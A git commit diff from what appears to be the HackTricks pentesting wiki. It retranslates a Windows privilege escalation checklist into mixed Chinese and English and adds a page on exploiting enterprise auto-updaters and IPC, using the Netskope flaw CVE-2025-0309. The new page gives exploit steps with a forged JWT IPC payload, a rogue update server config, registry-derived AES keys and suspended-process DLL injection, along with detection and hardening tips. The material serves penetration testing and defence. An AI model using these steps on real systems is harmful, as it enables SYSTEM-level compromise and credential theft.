Translated ['src/windows-hardening/checklist-windows-privilege-escalatio

2025-10-10 18:36:50 +00:00 · 2025-09-03 14:46:01 +00:00 · 2025-09-03 14:46:01 +00:00 · 3e2f2e25ed
commit 3e2f2e25ed
parent feab070220
4 changed files with 520 additions and 384 deletions
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@ -236,6 +236,7 @@
 - [Authentication Credentials Uac And Efs](windows-hardening/authentication-credentials-uac-and-efs.md)
 - [Checklist - Local Windows Privilege Escalation](windows-hardening/checklist-windows-privilege-escalation.md)
 - [Windows Local Privilege Escalation](windows-hardening/windows-local-privilege-escalation/README.md)
+  - [Abusing Auto Updaters And Ipc](windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md)
  - [Arbitrary Kernel Rw Token Theft](windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md)
  - [Dll Hijacking](windows-hardening/windows-local-privilege-escalation/dll-hijacking.md)
  - [Abusing Tokens](windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md)
--- a/src/windows-hardening/checklist-windows-privilege-escalation.md
+++ b/src/windows-hardening/checklist-windows-privilege-escalation.md
@ -1,114 +1,115 @@
-# 检查清单 - 本地 Windows 权限提升
+# 检查表 - Local Windows Privilege Escalation

 {{#include ../banners/hacktricks-training.md}}

-### **查找 Windows 本地权限提升向量的最佳工具：** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
+### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)

-### [系统信息](windows-local-privilege-escalation/index.html#system-info)
+### [System Info](windows-local-privilege-escalation/index.html#system-info)

- [ ] 获取 [**系统信息**](windows-local-privilege-escalation/index.html#system-info)
- [ ] 使用脚本搜索 **内核** [**漏洞**](windows-local-privilege-escalation/index.html#version-exploits)
- [ ] 使用 **Google 搜索** 内核 **漏洞**
- [ ] 使用 **searchsploit 搜索** 内核 **漏洞**
- [ ] [**环境变量**](windows-local-privilege-escalation/index.html#environment) 中有趣的信息？
- [ ] [**PowerShell 历史**](windows-local-privilege-escalation/index.html#powershell-history) 中的密码？
- [ ] [**Internet 设置**](windows-local-privilege-escalation/index.html#internet-settings) 中有趣的信息？
- [ ] [**驱动器**](windows-local-privilege-escalation/index.html#drives)？
- [ ] [**WSUS 漏洞**](windows-local-privilege-escalation/index.html#wsus)？
+- [ ] 获取 [**System information**](windows-local-privilege-escalation/index.html#system-info)
+- [ ] 搜索 **kernel** [**exploits using scripts**](windows-local-privilege-escalation/index.html#version-exploits)
+- [ ] 使用 **Google to search** 查找 kernel **exploits**
+- [ ] 使用 **searchsploit to search** 查找 kernel **exploits**
+- [ ] [**env vars**](windows-local-privilege-escalation/index.html#environment) 中有有趣的信息吗？
+- [ ] [**PowerShell history**](windows-local-privilege-escalation/index.html#powershell-history) 中有密码吗？
+- [ ] [**Internet settings**](windows-local-privilege-escalation/index.html#internet-settings) 中有有趣信息吗？
+- [ ] [**Drives**](windows-local-privilege-escalation/index.html#drives)？
+- [ ] [**WSUS exploit**](windows-local-privilege-escalation/index.html#wsus)？
+- [ ] [**Third-party agent auto-updaters / IPC abuse**](windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md)
 - [ ] [**AlwaysInstallElevated**](windows-local-privilege-escalation/index.html#alwaysinstallelevated)？

-### [日志/AV 枚举](windows-local-privilege-escalation/index.html#enumeration)
+### [Logging/AV enumeration](windows-local-privilege-escalation/index.html#enumeration)

- [ ] 检查 [**审计**](windows-local-privilege-escalation/index.html#audit-settings) 和 [**WEF**](windows-local-privilege-escalation/index.html#wef) 设置
+- [ ] 检查 [**Audit** ](windows-local-privilege-escalation/index.html#audit-settings) 和 [**WEF** ](windows-local-privilege-escalation/index.html#wef) 设置
 - [ ] 检查 [**LAPS**](windows-local-privilege-escalation/index.html#laps)
- [ ] 检查 [**WDigest**](windows-local-privilege-escalation/index.html#wdigest) 是否处于活动状态
- [ ] [**LSA 保护**](windows-local-privilege-escalation/index.html#lsa-protection)？
- [ ] [**凭据保护**](windows-local-privilege-escalation/index.html#credentials-guard)[?](windows-local-privilege-escalation/index.html#cached-credentials)
- [ ] [**缓存凭据**](windows-local-privilege-escalation/index.html#cached-credentials)？
+- [ ] 检查 [**WDigest** ](windows-local-privilege-escalation/index.html#wdigest) 是否激活
+- [ ] [**LSA Protection**](windows-local-privilege-escalation/index.html#lsa-protection)？
+- [ ] [**Credentials Guard**](windows-local-privilege-escalation/index.html#credentials-guard)[?](windows-local-privilege-escalation/index.html#cached-credentials)
+- [ ] [**Cached Credentials**](windows-local-privilege-escalation/index.html#cached-credentials)？
 - [ ] 检查是否有任何 [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md)
- [ ] [**AppLocker 策略**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/README.md#applocker-policy)？
+- [ ] [**AppLocker Policy**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/README.md#applocker-policy)？
 - [ ] [**UAC**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control/README.md)
- [ ] [**用户权限**](windows-local-privilege-escalation/index.html#users-and-groups)
- [ ] 检查 [**当前**] 用户 [**权限**](windows-local-privilege-escalation/index.html#users-and-groups)
- [ ] 你是 [**任何特权组的成员**](windows-local-privilege-escalation/index.html#privileged-groups)吗？
- [ ] 检查你是否启用了 [这些令牌](windows-local-privilege-escalation/index.html#token-manipulation)：**SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
- [ ] [**用户会话**](windows-local-privilege-escalation/index.html#logged-users-sessions)？
- [ ] 检查 [**用户主目录**](windows-local-privilege-escalation/index.html#home-folders)（访问？）
- [ ] 检查 [**密码策略**](windows-local-privilege-escalation/index.html#password-policy)
- [ ] [**剪贴板**](windows-local-privilege-escalation/index.html#get-the-content-of-the-clipboard) 中有什么？
+- [ ] [**User Privileges**](windows-local-privilege-escalation/index.html#users-and-groups)
+- [ ] 检查 [**current** user **privileges**](windows-local-privilege-escalation/index.html#users-and-groups)
+- [ ] 你是否为 [**member of any privileged group**](windows-local-privilege-escalation/index.html#privileged-groups)？
+- [ ] 检查你是否启用以下任何 token: **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
+- [ ] [**Users Sessions**](windows-local-privilege-escalation/index.html#logged-users-sessions)？
+- [ ] 检查 [**users homes**](windows-local-privilege-escalation/index.html#home-folders)（访问？）
+- [ ] 检查 [**Password Policy**](windows-local-privilege-escalation/index.html#password-policy)
+- [ ] 剪贴板中有什么？ [**inside the Clipboard**](windows-local-privilege-escalation/index.html#get-the-content-of-the-clipboard)?

-### [网络](windows-local-privilege-escalation/index.html#network)
+### [Network](windows-local-privilege-escalation/index.html#network)

- [ ] 检查 **当前** [**网络** **信息**](windows-local-privilege-escalation/index.html#network)
- [ ] 检查 **隐藏的本地服务** 是否限制外部访问
+- [ ] 检查 **current** [**network** **information**](windows-local-privilege-escalation/index.html#network)
+- [ ] 检查受限于外部的隐藏本地服务

-### [运行中的进程](windows-local-privilege-escalation/index.html#running-processes)
+### [Running Processes](windows-local-privilege-escalation/index.html#running-processes)

- [ ] 进程二进制文件 [**文件和文件夹权限**](windows-local-privilege-escalation/index.html#file-and-folder-permissions)
- [ ] [**内存密码挖掘**](windows-local-privilege-escalation/index.html#memory-password-mining)
- [ ] [**不安全的 GUI 应用程序**](windows-local-privilege-escalation/index.html#insecure-gui-apps)
- [ ] 通过 `ProcDump.exe` 偷取 **有趣进程** 的凭据？（firefox, chrome 等 ...）
+- [ ] 检查进程二进制的 [**file and folders permissions**](windows-local-privilege-escalation/index.html#file-and-folder-permissions)
+- [ ] [**Memory Password mining**](windows-local-privilege-escalation/index.html#memory-password-mining)
+- [ ] [**Insecure GUI apps**](windows-local-privilege-escalation/index.html#insecure-gui-apps)
+- [ ] 通过 `ProcDump.exe` 使用 **interesting processes** 窃取凭据？(firefox, chrome, etc ...)

-### [服务](windows-local-privilege-escalation/index.html#services)
+### [Services](windows-local-privilege-escalation/index.html#services)

- [ ] [你能 **修改任何服务** 吗？](windows-local-privilege-escalation/index.html#permissions)
- [ ] [你能 **修改** 任何 **服务** 执行的 **二进制文件** 吗？](windows-local-privilege-escalation/index.html#modify-service-binary-path)
- [ ] [你能 **修改** 任何 **服务** 的 **注册表** 吗？](windows-local-privilege-escalation/index.html#services-registry-modify-permissions)
- [ ] [你能利用任何 **未加引号的服务** 二进制 **路径** 吗？](windows-local-privilege-escalation/index.html#unquoted-service-paths)
+- [ ] [Can you **modify any service**?](windows-local-privilege-escalation/index.html#permissions)
+- [ ] [Can you **modify** the **binary** that is **executed** by any **service**?](windows-local-privilege-escalation/index.html#modify-service-binary-path)
+- [ ] [Can you **modify** the **registry** of any **service**?](windows-local-privilege-escalation/index.html#services-registry-modify-permissions)
+- [ ] [Can you take advantage of any **unquoted service** binary **path**?](windows-local-privilege-escalation/index.html#unquoted-service-paths)

-### [**应用程序**](windows-local-privilege-escalation/index.html#applications)
+### [**Applications**](windows-local-privilege-escalation/index.html#applications)

- [ ] **写入** [**已安装应用程序的权限**](windows-local-privilege-escalation/index.html#write-permissions)
- [ ] [**启动应用程序**](windows-local-privilege-escalation/index.html#run-at-startup)
- [ ] **易受攻击的** [**驱动程序**](windows-local-privilege-escalation/index.html#drivers)
+- [ ] **Write** [**permissions on installed applications**](windows-local-privilege-escalation/index.html#write-permissions)
+- [ ] [**Startup Applications**](windows-local-privilege-escalation/index.html#run-at-startup)
+- [ ] **Vulnerable** [**Drivers**](windows-local-privilege-escalation/index.html#drivers)

-### [DLL 劫持](windows-local-privilege-escalation/index.html#path-dll-hijacking)
+### [DLL Hijacking](windows-local-privilege-escalation/index.html#path-dll-hijacking)

- [ ] 你能 **在 PATH 中的任何文件夹中写入** 吗？
- [ ] 是否有任何已知的服务二进制文件 **尝试加载任何不存在的 DLL**？
- [ ] 你能 **在任何二进制文件夹中写入** 吗？
+- [ ] 你可以在 PATH 的任何文件夹中写入吗？
+- [ ] 是否存在任何已知服务二进制尝试加载不存在的 DLL？
+- [ ] 你可以在任何 **binaries folder** 中写入吗？

-### [网络](windows-local-privilege-escalation/index.html#network)
+### [Network](windows-local-privilege-escalation/index.html#network)

- [ ] 枚举网络（共享、接口、路由、邻居等...）
- [ ] 特别关注在本地主机（127.0.0.1）上监听的网络服务
+- [ ] 枚举网络（shares, interfaces, routes, neighbours, ...）
+- [ ] 特别关注监听在 localhost (127.0.0.1) 的网络服务

-### [Windows 凭据](windows-local-privilege-escalation/index.html#windows-credentials)
+### [Windows Credentials](windows-local-privilege-escalation/index.html#windows-credentials)

- [ ] [**Winlogon**](windows-local-privilege-escalation/index.html#winlogon-credentials) 凭据
- [ ] [**Windows Vault**](windows-local-privilege-escalation/index.html#credentials-manager-windows-vault) 中你可以使用的凭据？
- [ ] 有趣的 [**DPAPI 凭据**](windows-local-privilege-escalation/index.html#dpapi)？
- [ ] 保存的 [**Wifi 网络**](windows-local-privilege-escalation/index.html#wifi) 中的密码？
- [ ] [**保存的 RDP 连接**](windows-local-privilege-escalation/index.html#saved-rdp-connections) 中有趣的信息？
- [ ] [**最近运行的命令**](windows-local-privilege-escalation/index.html#recently-run-commands) 中的密码？
- [ ] [**远程桌面凭据管理器**](windows-local-privilege-escalation/index.html#remote-desktop-credential-manager) 密码？
- [ ] [**AppCmd.exe** 存在](windows-local-privilege-escalation/index.html#appcmd-exe)吗？凭据？
- [ ] [**SCClient.exe**](windows-local-privilege-escalation/index.html#scclient-sccm)？DLL 侧加载？
+- [ ] [**Winlogon** ](windows-local-privilege-escalation/index.html#winlogon-credentials) 凭据
+- [ ] [**Windows Vault**](windows-local-privilege-escalation/index.html#credentials-manager-windows-vault) 中可用的凭据？
+- [ ] 有趣的 [**DPAPI credentials**](windows-local-privilege-escalation/index.html#dpapi)？
+- [ ] 已保存的 [**Wifi networks**](windows-local-privilege-escalation/index.html#wifi) 密码？
+- [ ] [**saved RDP Connections**](windows-local-privilege-escalation/index.html#saved-rdp-connections) 中有有趣信息？
+- [ ] [**recently run commands**](windows-local-privilege-escalation/index.html#recently-run-commands) 中有密码？
+- [ ] [**Remote Desktop Credentials Manager**](windows-local-privilege-escalation/index.html#remote-desktop-credential-manager) 密码？
+- [ ] [**AppCmd.exe** exists](windows-local-privilege-escalation/index.html#appcmd-exe)? Credentials?
+- [ ] [**SCClient.exe**](windows-local-privilege-escalation/index.html#scclient-sccm)? DLL Side Loading?

-### [文件和注册表（凭据）](windows-local-privilege-escalation/index.html#files-and-registry-credentials)
+### [Files and Registry (Credentials)](windows-local-privilege-escalation/index.html#files-and-registry-credentials)

- [ ] **Putty:** [**凭据**](windows-local-privilege-escalation/index.html#putty-creds) **和** [**SSH 主机密钥**](windows-local-privilege-escalation/index.html#putty-ssh-host-keys)
- [ ] [**注册表中的 SSH 密钥**](windows-local-privilege-escalation/index.html#ssh-keys-in-registry)？
- [ ] [**无人值守文件**](windows-local-privilege-escalation/index.html#unattended-files) 中的密码？
- [ ] 任何 [**SAM & SYSTEM**](windows-local-privilege-escalation/index.html#sam-and-system-backups) 备份？
- [ ] [**云凭据**](windows-local-privilege-escalation/index.html#cloud-credentials)？
- [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/index.html#mcafee-sitelist.xml) 文件？
- [ ] [**缓存的 GPP 密码**](windows-local-privilege-escalation/index.html#cached-gpp-pasword)？
- [ ] [**IIS Web 配置文件**](windows-local-privilege-escalation/index.html#iis-web-config) 中的密码？
- [ ] [**Web 日志**](windows-local-privilege-escalation/index.html#logs) 中有趣的信息？
- [ ] 你想要 [**向用户请求凭据**](windows-local-privilege-escalation/index.html#ask-for-credentials) 吗？
- [ ] [**回收站**](windows-local-privilege-escalation/index.html#credentials-in-the-recyclebin) 中有趣的文件？
- [ ] 其他 [**包含凭据的注册表**](windows-local-privilege-escalation/index.html#inside-the-registry)？
- [ ] [**浏览器数据**](windows-local-privilege-escalation/index.html#browsers-history) 中（数据库、历史记录、书签等）？
- [ ] [**通用密码搜索**](windows-local-privilege-escalation/index.html#generic-password-search-in-files-and-registry) 在文件和注册表中
- [ ] [**工具**](windows-local-privilege-escalation/index.html#tools-that-search-for-passwords) 自动搜索密码
+- [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/index.html#putty-creds) **and** [**SSH host keys**](windows-local-privilege-escalation/index.html#putty-ssh-host-keys)
+- [ ] [**SSH keys in registry**](windows-local-privilege-escalation/index.html#ssh-keys-in-registry)？
+- [ ] [**unattended files**](windows-local-privilege-escalation/index.html#unattended-files) 中有密码？
+- [ ] 是否有任何 [**SAM & SYSTEM**](windows-local-privilege-escalation/index.html#sam-and-system-backups) 备份？
+- [ ] [**Cloud credentials**](windows-local-privilege-escalation/index.html#cloud-credentials)？
+- [ ] 有 **McAfee SiteList.xml** 文件吗？([**McAfee SiteList.xml**](windows-local-privilege-escalation/index.html#mcafee-sitelist.xml))
+- [ ] [**Cached GPP Password**](windows-local-privilege-escalation/index.html#cached-gpp-pasword)？
+- [ ] 在 [**IIS Web config file**](windows-local-privilege-escalation/index.html#iis-web-config) 中有密码？
+- [ ] [**web** **logs**](windows-local-privilege-escalation/index.html#logs) 中有有趣信息？
+- [ ] 想要向用户 [**ask for credentials**](windows-local-privilege-escalation/index.html#ask-for-credentials) 吗？
+- [ ] 回收站中的有趣 [**files inside the Recycle Bin**](windows-local-privilege-escalation/index.html#credentials-in-the-recyclebin)？
+- [ ] 其他包含凭据的 [**registry containing credentials**](windows-local-privilege-escalation/index.html#inside-the-registry)？
+- [ ] 浏览器数据中（dbs, history, bookmarks, ...）有内容？ [**inside Browser data**](windows-local-privilege-escalation/index.html#browsers-history)
+- [ ] 在文件和注册表中进行 [**Generic password search**](windows-local-privilege-escalation/index.html#generic-password-search-in-files-and-registry)
+- [ ] 使用 [**Tools**](windows-local-privilege-escalation/index.html#tools-that-search-for-passwords) 自动搜索密码

-### [泄露的处理程序](windows-local-privilege-escalation/index.html#leaked-handlers)
+### [Leaked Handlers](windows-local-privilege-escalation/index.html#leaked-handlers)

- [ ] 你是否可以访问由管理员运行的任何进程的处理程序？
+- [ ] 你是否可以访问由管理员运行的进程的任何句柄？

-### [管道客户端冒充](windows-local-privilege-escalation/index.html#named-pipe-client-impersonation)
+### [Pipe Client Impersonation](windows-local-privilege-escalation/index.html#named-pipe-client-impersonation)

- [ ] 检查你是否可以利用它
+- [ ] 检查是否可以滥用它

 {{#include ../banners/hacktricks-training.md}}
--- a/src/windows-hardening/windows-local-privilege-escalation/README.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/README.md
--- a/src/windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md
@ -0,0 +1,123 @@
+# 滥用企业自动更新程序和特权 IPC (e.g., Netskope stAgentSvc)
+
+{{#include ../../banners/hacktricks-training.md}}
+
+本页概述了一类在企业端点代理和更新程序中发现的 Windows 本地提权链，这些组件暴露了低‑摩擦的 IPC 接口和特权更新流程。一个具有代表性的例子是 Netskope Client for Windows < R129 (CVE-2025-0309)，其中低权限用户可以强制使客户端注册到攻击者控制的服务器，然后交付被 SYSTEM 服务安装的恶意 MSI。
+
+Key ideas you can reuse against similar products:
+- 滥用特权服务的 localhost IPC 来强制重新注册或重新配置到攻击者服务器。
+- 实现厂商的更新端点，部署一个伪造的 Trusted Root CA，并将更新程序指向一个恶意的“签名”包。
+- 规避弱签名校验（CN allow‑lists）、可选的 digest flags 和宽松的 MSI properties。
+- 如果 IPC 是“encrypted”，从注册表中以全局可读方式存储的机器标识符推导出 key/IV。
+- 如果服务通过 image path/process name 限制调用者，注入到一个 allow‑listed 进程，或以 suspended 方式创建一个进程并通过最小的线程上下文修补来 bootstrap 你的 DLL。
+
+---
+## 1) 通过 localhost IPC 强制注册到攻击者服务器
+
+许多代理包含一个以用户模式运行的 UI 进程，该进程通过 localhost TCP 使用 JSON 与 SYSTEM 服务通信。
+
+Observed in Netskope:
+- UI: stAgentUI (low integrity) ↔ Service: stAgentSvc (SYSTEM)
+- IPC command ID 148: IDP_USER_PROVISIONING_WITH_TOKEN
+
+Exploit flow:
+1) 构造一个 JWT enrollment token，其 claims 控制后端主机（例如 AddonUrl）。使用 alg=None 以便不需要签名。
+2) 发送 IPC 消息，调用 provisioning 命令并附带你的 JWT 和 tenant name：
+```json
+{
+"148": {
+"idpTokenValue": "<JWT with AddonUrl=attacker-host; header alg=None>",
+"tenantName": "TestOrg"
+}
+}
+```
+3) 服务开始向你的恶意服务器请求 enrollment/config，例如：
+- /v1/externalhost?service=enrollment
+- /config/user/getbrandingbyemail
+
+Notes:
+- 如果调用者验证是基于路径/名称的，请从一个被允许的厂商二进制发起请求（参见 §4）。
+
+---
+## 2) Hijacking the update channel to run code as SYSTEM
+
+一旦客户端与您的服务器通信，实现客户端期望的端点并将其引导到攻击者的 MSI。典型流程：
+
+1) /v2/config/org/clientconfig → 返回 JSON 配置，设置非常短的更新器间隔，例如：
+```json
+{
+"clientUpdate": { "updateIntervalInMin": 1 },
+"check_msi_digest": false
+}
+```
+2) /config/ca/cert → 返回一个 PEM CA 证书。服务会将其安装到 Local Machine Trusted Root store。
+3) /v2/checkupdate → 提供指向恶意 MSI 和伪造版本的元数据。
+
+Bypassing common checks seen in the wild:
+- Signer CN allow‑list: 服务可能仅检查 Subject CN 是否等于 “netSkope Inc” 或 “Netskope, Inc.”。你的伪造 CA 可以为该 CN 签发一个 leaf 并签署 MSI。
+- CERT_DIGEST property: 在 MSI 中包含名为 CERT_DIGEST 的良性属性。安装时没有强制执行。
+- Optional digest enforcement: 配置标志（例如 check_msi_digest=false）会禁用额外的加密验证。
+
+Result: SYSTEM 服务会从
+C:\ProgramData\Netskope\stAgent\data\*.msi
+安装你的 MSI，以 NT AUTHORITY\SYSTEM 身份执行任意代码。
+
+---
+## 3) Forging encrypted IPC requests (when present)
+
+From R127, Netskope 将 IPC JSON 包装在看起来像 Base64 的 encryptData 字段中。逆向分析显示使用 AES，key/IV 来自任何用户都可读的注册表值：
+- Key = HKLM\SOFTWARE\NetSkope\Provisioning\nsdeviceidnew
+- IV  = HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductID
+
+攻击者可以复现该加密并以标准用户身份发送有效的加密命令。一般提示：如果代理突然“加密”其 IPC，请在 HKLM 下查找 device IDs、product GUIDs、install IDs 等作为密钥材料。
+
+---
+## 4) Bypassing IPC caller allow‑lists (path/name checks)
+
+一些服务通过解析 TCP 连接的 PID，并将镜像路径/名称与位于 Program Files 下的 allow‑listed 厂商二进制文件（例如 stagentui.exe、bwansvc.exe、epdlp.exe）进行比较来认证对端。
+
+两种实用的绕过方式：
+- 对一个 allow‑listed 进程（例如 nsdiag.exe）进行 DLL 注入，并在其内部代理 IPC。
+- 启动一个 allow‑listed 二进制并将其置于挂起状态，然后在不使用 CreateRemoteThread 的情况下引导你的代理 DLL（见 §5），以满足驱动强制的防篡改规则。
+
+---
+## 5) Tamper‑protection friendly injection: suspended process + NtContinue patch
+
+产品通常会附带一个 minifilter/OB callbacks 驱动（例如 Stadrv）来从受保护进程的句柄中剥除危险权限：
+- Process: 移除 PROCESS_TERMINATE、PROCESS_CREATE_THREAD、PROCESS_VM_READ、PROCESS_DUP_HANDLE、PROCESS_SUSPEND_RESUME
+- Thread: 限制为 THREAD_GET_CONTEXT、THREAD_QUERY_LIMITED_INFORMATION、THREAD_RESUME、SYNCHRONIZE
+
+一个可靠的遵守这些限制的用户模式加载器：
+1) 使用 CREATE_SUSPENDED 创建一个厂商二进制的 CreateProcess。
+2) 获取你仍被允许的句柄：对进程为 PROCESS_VM_WRITE | PROCESS_VM_OPERATION，对线程获取带有 THREAD_GET_CONTEXT/THREAD_SET_CONTEXT 的句柄（或者如果在已知的 RIP 上修补代码，则只需要 THREAD_RESUME）。
+3) 覆盖 ntdll!NtContinue（或其他早期、必然已映射的 thunk）为一个微小的 stub，该 stub 调用 LoadLibraryW 加载你的 DLL 路径，然后跳回原处。
+4) ResumeThread 触发你在进程内的 stub，从而加载你的 DLL。
+
+因为你从未对一个已被保护的进程使用 PROCESS_CREATE_THREAD 或 PROCESS_SUSPEND_RESUME（你是创建它的），驱动的策略得以满足。
+
+---
+## 6) Practical tooling
+- NachoVPN (Netskope plugin) 自动化生成 rogue CA、恶意 MSI 签名，并提供所需端点：/v2/config/org/clientconfig, /config/ca/cert, /v2/checkupdate。
+- UpSkope 是一个定制的 IPC 客户端，用于构造任意（可选 AES‑encrypted）IPC 消息，并包含从 allow‑listed 二进制发起的 suspended‑process 注入。
+
+---
+## 7) Detection opportunities (blue team)
+- 监控对 Local Machine Trusted Root 的新增。Sysmon + registry‑mod 事件（参见 SpecterOps 指南）效果良好。
+- 报警由代理服务触发、从类似 C:\ProgramData\<vendor>\<agent>\data\*.msi 路径执行的 MSI。
+- 审查代理日志以查找异常的 enrollment hosts/tenants，例如：C:\ProgramData\netskope\stagent\logs\nsdebuglog.log – 查找 addonUrl / tenant 异常以及 provisioning msg 148。
+- 对不是预期签名二进制的本地 IPC 客户端，或起源于异常子进程树的客户端触发告警。
+
+---
+## Hardening tips for vendors
+- 将 enrollment/update 主机绑定到严格的 allow‑list；在 client 代码中拒绝不受信任的域名。
+- 使用操作系统原语对 IPC 对端进行认证（ALPC security、named‑pipe SIDs），而不是基于镜像路径/名称的检查。
+- 不要将秘密材料放在所有用户可读的 HKLM；如果必须对 IPC 进行加密，应从受保护的密钥派生，或通过已认证的通道协商密钥。
+- 将 updater 视为供应链攻击面：要求完整链到你控制的受信任 CA，针对固定密钥验证包签名，如果配置中禁用验证则采取 fail‑closed 策略。
+
+## References
+- [Advisory – Netskope Client for Windows – Local Privilege Escalation via Rogue Server (CVE-2025-0309)](https://blog.amberwolf.com/blog/2025/august/advisory---netskope-client-for-windows---local-privilege-escalation-via-rogue-server/)
+- [NachoVPN – Netskope plugin](https://github.com/AmberWolfCyber/NachoVPN)
+- [UpSkope – Netskope IPC client/exploit](https://github.com/AmberWolfCyber/UpSkope)
+- [NVD – CVE-2025-0309](https://nvd.nist.gov/vuln/detail/CVE-2025-0309)
+
+{{#include ../../banners/hacktricks-training.md}}